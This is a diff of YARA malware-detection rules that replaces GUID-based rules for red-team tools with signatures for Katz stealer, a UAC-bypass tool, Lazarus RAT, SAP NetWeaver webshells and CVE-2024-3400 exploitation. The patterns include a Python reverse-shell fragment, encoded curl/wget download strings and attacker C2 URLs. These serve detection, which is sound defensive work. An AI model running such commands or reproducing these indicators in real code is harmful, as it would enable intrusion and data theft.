-		logic_hash = "45e75eee8ece293a35ac385311994cf8b23fd4f38d84bf53bd724e03ec092e4e"
-		score = 75
+		logic_hash = "d5c199d9c3e449ca282f0ca91c94ac783709299b3489f7cec38177a2f843b504"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "4b2b3bd4-d28f-44cc-96b3-4a2f64213109" ascii wide
+		$x1 = "import sys,socket,os,pty;s=socket.socket("
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Wheresmyimplant : FILE
+rule SIGNATURE_BASE_SUSP_LNX_Base64_Exec_Apr24 : SCRIPT CVE_2024_3400 FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c99523ce-e2c0-5a21-89d1-70c0dd970731"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/0xbadjuju/WheresMyImplant"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2888-L2901"
+		description = "Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)"
+		author = "Christian Burkard"
+		id = "2da3d050-86b0-5903-97eb-c5f39ce4f3a3"
+		date = "2024-04-18"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L81-L105"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e25816823669753dc475c059320634203e9f9450c320baac3af0d6c996a17264"
+		logic_hash = "e96fb7c8faac12c1f0210689f2b3a7903b42a543b97ddff11298e5ae13cae80b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "SCRIPT, CVE-2024-3400, FILE"
 
 	strings:
-		$typelibguid0lo = "cca59e4e-ce4d-40fc-965f-34560330c7e6" ascii wide
+		$s1 = "curl http://" base64
+		$s2 = "wget http://" base64
+		$s3 = ";chmod 777 " base64
+		$mirai = "country="
+		$fp1 = "<html"
+		$fp2 = "<?xml"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 800KB and 1 of ( $s* ) and not $mirai and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Naga : FILE
+rule SIGNATURE_BASE_MAL_Katz_Stealer_May25 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3a9d3154-a8f1-57a4-8b61-498e2ebdfa42"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/byt3bl33d3r/Naga"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2903-L2917"
+		description = "Detects Katz stealer"
+		author = "MalGamy (Nextron Systems)"
+		id = "efa42aec-b653-5e94-8d5b-73f0aab2a54d"
+		date = "2025-05-16"
+		modified = "2025-05-22"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_katz_stealer.yar#L1-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c579546957c1b05d5fff7ad914d4b6de22ccf216bda92972abd66b0dae89895b"
-		score = 75
+		hash = "fdc86a5b3d7df37a72c3272836f743747c47bfbc538f05af9ecf78547fa2e789"
+		hash = "d92bb6e47cb0a0bdbb51403528ccfe643a9329476af53b5a729f04a4d2139647"
+		logic_hash = "73364c2291dc792f46858dda057f08805db55fe1f1e54d6b0dee0a0c8a412259"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "99428732-4979-47b6-a323-0bb7d6d07c95" ascii wide
-		$typelibguid1lo = "a2c9488f-6067-4b17-8c6f-2d464e65c535" ascii wide
+		$s1 = "Motherboard Product: %s" ascii
+		$s2 = "cmd.exe /c %s" ascii
+		$s3 = "reg export \"%s\" \"%s\" /y" ascii
+		$s4 = ").request({ hostname: '" ascii
+		$s5 = "Type: Removable"
+		$s6 = "%s\\Microsoft\\Windows Live Mail" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 4 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpbox : FILE
+rule SIGNATURE_BASE_MAL_DLL_Chrome_App_Bound_Encryption_Decryption_May25 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "fda1a67f-d746-5ddb-a33f-97d608b13bc9"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/P1CKLES/SharpBox"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2919-L2932"
+		description = "Detects a DLL used to decrypt App-Bound Encrypted (ABE) cookies, passwords and payment methods from Chromium-based browsers. Seen being used by Katz stealer"
+		author = "MAlGamy"
+		id = "bc77e972-fd7e-55dd-b118-ee76f19cde1a"
+		date = "2025-05-19"
+		modified = "2025-05-22"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_katz_stealer.yar#L23-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1a52663ffad8b36d8e6be74c341fb26205b9605df35530b19ab2f4a4c454eb16"
-		score = 75
+		hash = "6dc8e99da68b703e86fa90a8794add87614f254f804a8d5d65927e0676107a9d"
+		logic_hash = "d5488728a3ee8f2f59ed9798b80d516f7f131e39b3d5099ad5168ffc8ff22718"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "616c1afb-2944-42ed-9951-bf435cadb600" ascii wide
+		$s1 = "Failed to set proxy blanket." ascii
+		$s2 = "Decryption failed. Last error:" ascii
+		$s3 = "\\Google\\Chrome\\User Data\\Local State" ascii
+		$op1 = {48 39 F3 74 ?? 4C 89 E2 48 89 E9 E8 ?? ?? ?? ?? 48 89 C1 48 8B 00 B2 ?? 48 8B 40 ?? 48 C7 44 01 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 13 48 89 C1 E8 ?? ?? ?? ?? 48 FF C3 EB ?? 48 8D 54 24 ?? 48 89 F9 E8 ?? ?? ?? ?? 48 89 E9 E8 ?? ?? ?? ?? 48 89 F8 48 81 C4}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2MB and $op1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Rundotnetdll32 : FILE
+rule SIGNATURE_BASE_SUSP_Katz_Log_May25 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "266c8add-d2ca-5e46-8594-5d190447d133"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/0xbadjuju/rundotnetdll32"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2934-L2947"
+		description = "Detects log file that contains system reconnaissance data, seen being generated by Katz stealer"
+		author = "MalGamy"
+		id = "29ef2f42-d360-59f9-bb70-b0c68f9dfb7c"
+		date = "2025-05-20"
+		modified = "2025-05-22"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_katz_stealer.yar#L43-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d0a0fa8604eaca14e2fc8545c5b008d26ef1a09f3d792b62549d76fb2d5155d1"
-		score = 75
+		hash = "1ac196ac6393d786618c944a7ab77fb189a6b4ba00af5c0f987c3dc65876c060"
+		hash = "ad76e2727469525dec7e56977589dd250ca57a29b8b0d42cd5c42e536c285241"
+		hash = "e1a0d6929662bcbc9e5e0827cb8b6d7818088e996cf971d2a4a1c1ca4208e533"
+		hash = "b10796c41e1cec7c84a3c68bfcaa7b20f49b620d1c94304a6b3ed73471fa9031"
+		hash = "5a984e2e308fe84e4e2071dd877772361719ba0217c2c23da79dbb82dc15eac8"
+		logic_hash = "847ab8f9a7abf260f4185d41ae9cb9af40c28726338ff2306a75d2160ae61f03"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "a766db28-94b6-4ed1-aef9-5200bbdd8ca7" ascii wide
+		$s1 = "Motherboard Manufacturer:" ascii
+		$s2 = "===== System Information =====" ascii
+		$s3 = "Volume Name:" ascii
+		$s4 = "Desktop Hostname:" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 50KB and 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Antidebug : FILE
+rule SIGNATURE_BASE_MAL_NET_Katz_Stealer_Loader_May25
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f381081b-d0cb-593d-ad3d-28816f770b67"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/malcomvetter/AntiDebug"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2949-L2962"
+		description = "Detects .NET based Katz stealer loader"
+		author = "Jonathan Peters (cod3nym)"
+		id = "90e86bb2-ffb2-5968-9cdc-705efac73b0d"
+		date = "2025-05-21"
+		modified = "2025-05-22"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_katz_stealer.yar#L65-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b665c72e191cc42307f6eecbf0a9ea9238da886e8d5d73b2d569cda2dabe2b1a"
-		score = 75
+		hash = "0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7"
+		logic_hash = "1922520d8c34660a0afff2f552ef0d1c6ec093fb10a00816e0216f574b686221"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "997265c1-1342-4d44-aded-67964a32f859" ascii wide
+		$x = "ExecutarMetodoVAI" ascii
+		$s1 = "VirtualMachineDetector" ascii
+		$s2 = "Wow64SetThreadContext_API" ascii
+		$s3 = "nomedoarquivo" ascii
+		$s4 = { 65 78 74 65 6E C3 A7 61 6F 00 }
+		$s5 = "payloadBuffer" ascii
+		$s6 = "caminhovbs" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		3 of ( $s* ) or $x
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dinvisibleregistry : FILE
+rule SIGNATURE_BASE_MAL_NET_UAC_Bypass_May25 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "98409bbe-6346-5825-b7f7-c1afeac2b038"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/NVISO-BE/DInvisibleRegistry"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2964-L2977"
+		description = "Detects .NET based tool abusing legitimate Windows utility cmstp.exe to bypass UAC (User-Admin-Controls)"
+		author = "Jonathan Peters (cod3nym)"
+		id = "5d714088-c917-51b5-b422-1d8fa00b1949"
+		date = "2025-05-21"
+		modified = "2025-05-22"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_katz_stealer.yar#L86-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7703b24ca72770547d76ebfb8b94b5d13d9d7fa1c65cc8e2ffbf8eca30c1f8d0"
-		score = 75
+		hash = "4f12c5dca2099492d0c0cd22edef841cbe8360af9be2d8e9b57c2f83d401c1a7"
+		hash = "fcad234dc2ad5e2d8215bcf6caac29aef62666c34564e723fa6d2eee8b6468ed"
+		logic_hash = "4a3f6e90af6f9a8a4dfa8e336eb8c714e5f02625ca2bf5bf8b1bca9cbda6a99e"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "31d576fb-9fb9-455e-ab02-c78981634c65" ascii wide
+		$x1 = "CmstpBypass" ascii
+		$x2 = { 52 00 45 00 50 00 4C 00 41 00 43 00 45 00 5F 00 43 00 4F 00 4D 00 4D 00 41 00 4E 00 44 00 5F 00 4C 00 49 00 4E 00 45 00 00 13 63 00 6D 00 73 00 74 00 70 00 2E 00 65 00 78 00 65 00 00 33 63 00 6D 00 73 00 74 00 70 00 2E 00 65 00 78 00 65 }
+		$x3 = { 52 00 45 00 50 00 4C 00 41 00 43 00 45 00 5F 00 43 00 4F 00 4D 00 4D 00 41 00 4E 00 44 00 5F 00 4C 00 49 00 4E 00 45 00 0D 00 0A 00 74 00 61 00 73 00 6B 00 6B 00 69 00 6C 00 6C 00 20 00 2F 00 49 00 4D 00 20 00 63 00 6D 00 73 00 74 00 70 00 2E 00 65 00 78 00 65 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and $x1 or 1 of ( $x2 , $x3 )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Tikitorch : FILE
+
+rule SIGNATURE_BASE_APT_Lazarus_Dropper_Jun18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "354ee690-a0d0-5cc5-a73b-53b916ed0169"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/rasta-mouse/TikiTorch"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2979-L2998"
+		description = "Detects Lazarus Group Dropper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "226be9d4-93c0-5512-9667-3388cd6f20d4"
+		date = "2018-06-01"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/DrunkBinary/status/1002587521073721346"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_jun18.yar#L13-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "394b4e7ecb7333e7d0944690276de6d942dfa949ba04d28d5576da639a5489bc"
-		score = 75
-		quality = 85
+		logic_hash = "868297209177471f29c9653747d3205f55a14b74a5da64562b20ebeadb14b1cf"
+		score = 60
+		quality = 65
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "086a50476f5ceee4b10871c1a8b0a794e96a337966382248a8289598b732bd47"
+		hash2 = "9f2d4fd79d3c68270102c4c11f3e968c10610a2106cbf1298827f8efccdd70a9"
 
 	strings:
-		$typelibguid0lo = "806c6c72-4adc-43d9-b028-6872fa48d334" ascii wide
-		$typelibguid1lo = "2ef9d8f7-6b77-4b75-822b-6a53a922c30f" ascii wide
-		$typelibguid2lo = "8f5f3a95-f05c-4dce-8bc3-d0a0d4153db6" ascii wide
-		$typelibguid3lo = "1f707405-9708-4a34-a809-2c62b84d4f0a" ascii wide
-		$typelibguid4lo = "97421325-b6d8-49e5-adf0-e2126abc17ee" ascii wide
-		$typelibguid5lo = "06c247da-e2e1-47f3-bc3c-da0838a6df1f" ascii wide
-		$typelibguid6lo = "fc700ac6-5182-421f-8853-0ad18cdbeb39" ascii wide
+		$s1 = /%s\\windows10-kb[0-9]{7}.exe/ fullword ascii
+		$s2 = "EYEJIW" fullword ascii
+		$s3 = "update" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 21000KB and ( pe.imphash ( ) == "fcac768eff9896d667a7c706d70712ce" or all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Hivejack : FILE
+rule SIGNATURE_BASE_APT_Lazarus_RAT_Jun18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "10567ef4-780f-5e93-9061-3214116d6bbb"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/Viralmaniar/HiveJack"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3000-L3013"
+		description = "Detects Lazarus Group RAT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fd394d15-70c5-543a-a845-2058f296b5f8"
+		date = "2018-06-01"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/DrunkBinary/status/1002587521073721346"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_jun18.yar#L34-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "46eb7b01deb14eb7a9e1b59f04844b442a47a5c3545fa9925448349ef50e317e"
+		logic_hash = "7260f766ffd1122319ca69a6c87b0baa98d5727929f2e063a5b2edb05a44d827"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c10363059c57c52501c01f85e3bb43533ccc639f0ea57f43bae5736a8e7a9bc8"
+		hash2 = "e98991cdd9ddd30adf490673c67a4f8241993f26810da09b52d8748c6160a292"
 
 	strings:
-		$typelibguid0lo = "e12e62fe-bea3-4989-bf04-6f76028623e3" ascii wide
+		$a1 = "www.marmarademo.com/include/extend.php" fullword ascii
+		$a2 = "www.33cow.com/include/control.php" fullword ascii
+		$a3 = "www.97nb.net/include/arc.sglistview.php" fullword ascii
+		$c1 = "Content-Disposition: form-data; name=\"file1\"; filename=\"example.dat\"" fullword ascii
+		$c2 = "Content-Disposition: form-data; name=\"file1\"; filename=\"pratice.pdf\"" fullword ascii
+		$c3 = "Content-Disposition: form-data; name=\"file1\"; filename=\"happy.pdf\"" fullword ascii
+		$c4 = "Content-Disposition: form-data; name=\"file1\"; filename=\"my.doc\"" fullword ascii
+		$c5 = "Content-Disposition: form-data; name=\"board_id\"" fullword ascii
+		$s1 = "Winhttp.dll" fullword ascii
+		$s2 = "Wsock32.dll" fullword ascii
+		$s3 = "WM*.tmp" fullword ascii
+		$s4 = "FM*.tmp" fullword ascii
+		$s5 = "Cache-Control: max-age=0" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $a* ) or 2 of ( $c* ) or 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Decryptautologon : FILE
+rule SIGNATURE_BASE_APT_Lazarus_RAT_Jun18_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3ef58da9-16c1-54cf-9d06-a05680548cf5"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/securesean/DecryptAutoLogon"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3015-L3028"
+		description = "Detects Lazarus Group RAT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4f2e280e-ed76-5fb9-b137-5191bbea2155"
+		date = "2018-06-01"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/DrunkBinary/status/1002587521073721346"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_jun18.yar#L68-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "122f265f812e81aef554c1907c8397ac4ad03ff85f53254806abe36049c9b746"
+		logic_hash = "b22b8386791e86f787efc40a394bbabdb4a009fc2d1a7b87aaf5039fc977a5bd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e6096fb512a6d32a693491f24e67d772f7103805ad407dc37065cebd1962a547"
 
 	strings:
-		$typelibguid0lo = "015a37fc-53d0-499b-bffe-ab88c5086040" ascii wide
+		$s1 = "\\KB\\Release\\" ascii
+		$s3 = "KB, Version 1.0" fullword wide
+		$s4 = "TODO: (c) <Company name>.  All rights reserved." fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Unstoppableservice : FILE
+rule SIGNATURE_BASE_APT_SAP_Netweaver_Exploitation_Activity_Apr25_1 : SCRIPT CVE_2025_31324 FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8c65fbee-d779-57a8-851b-7583be66c67a"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/malcomvetter/UnstoppableService"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3030-L3043"
+		description = "Detects forensic artefacts related to exploitation activity of SAP NetWeaver CVE-2025-31324"
+		author = "Florian Roth"
+		id = "78863492-5c83-55a8-900b-057e99125414"
+		date = "2025-04-25"
+		modified = "2025-05-15"
+		reference = "https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sap_netweaver_apr25.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ad88047730485852c1d051f168b762da18a85242acf0850204dd5fc86b313390"
-		score = 75
+		logic_hash = "ab6c5e17bba15a3f968bdbe88a8cf4a039c55b6035d91fd3c6b30092be89af5c"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "SCRIPT, CVE-2025-31324, FILE"
 
 	strings:
-		$typelibguid0lo = "0c117ee5-2a21-dead-beef-8cc7f0caaa86" ascii wide
+		$x01 = "/helper.jsp?cmd=" ascii wide
+		$x02 = "/cache.jsp?cmd=" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 20MB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwmi_2 : FILE
+rule SIGNATURE_BASE_APT_SAP_Netweaver_Exploitation_Activity_Apr25_2 : SCRIPT CVE_2025_31324 FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e6ab2f5e-2a5a-5be9-9b66-96cb745fd199"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		old_rule_name = "HKTL_NET_GUID_SharpWMI"
-		reference = "https://github.com/GhostPack/SharpWMI"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3045-L3059"
+		description = "Detects forensic artefacts related to exploitation activity of SAP NetWeaver CVE-2025-31324"
+		author = "Florian Roth"
+		id = "17fb236e-e78c-51e5-b0a8-14964e38dfc5"
+		date = "2025-04-25"
+		modified = "2025-05-15"
+		reference = "https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sap_netweaver_apr25.yar#L16-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "968eddc046e0629fed50d77c3b6c55a6d88d4fa68f05bab77f4b43bea6ad62fc"
-		score = 75
+		logic_hash = "dfc24a4f359e2bc899ab3924bd342c2c6bd8c757b7c1d3859a47f61b9e4039a9"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "SCRIPT, CVE-2025-31324, FILE"
 
 	strings:
-		$typelibguid0lo = "6dd22880-dac5-4b4d-9c91-8c35cc7b8180" ascii wide
+		$x03 = "MSBuild.exe c:\\programdata\\" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 20MB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Ewstoolkit : FILE
+rule SIGNATURE_BASE_SUSP_WEBSHELL_Cmd_Indicator_Apr25
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "acde7744-d17f-5e47-a5e2-ff4f4c4d8093"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/rasta-mouse/EWSToolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3061-L3074"
+		description = "Detects a pattern which is often related to web shell activity"
+		author = "Florian Roth"
+		id = "735359b2-9f94-5618-8ec5-7ab8f5e5e16d"
+		date = "2025-04-25"
+		modified = "2025-05-07"
+		reference = "https://regex101.com/r/N6oZ2h/2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sap_netweaver_apr25.yar#L29-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d8e10bc2bc8dc0b526f919eed141660555334b97f528d3a74c5b91db05394fad"
-		score = 75
+		logic_hash = "b992786a58389749db40fc90363f00c5df374d514374afc2d6fdff4429cb1ec0"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "ca536d67-53c9-43b5-8bc8-9a05fdc567ed" ascii wide
+		$xr01 = /\.(asp|aspx|jsp|php)\?cmd=[a-z0-9%+\-\/\.]{3,20} HTTP\/1\.[01]["']? 200/
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sweetpotato : FILE
+rule SIGNATURE_BASE_Exploit_MS15_077_078 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0e347d94-51eb-5589-93d8-b19fec7f2365"
-		date = "2020-12-28"
-		modified = "2025-08-15"
-		reference = "https://github.com/CCob/SweetPotato"
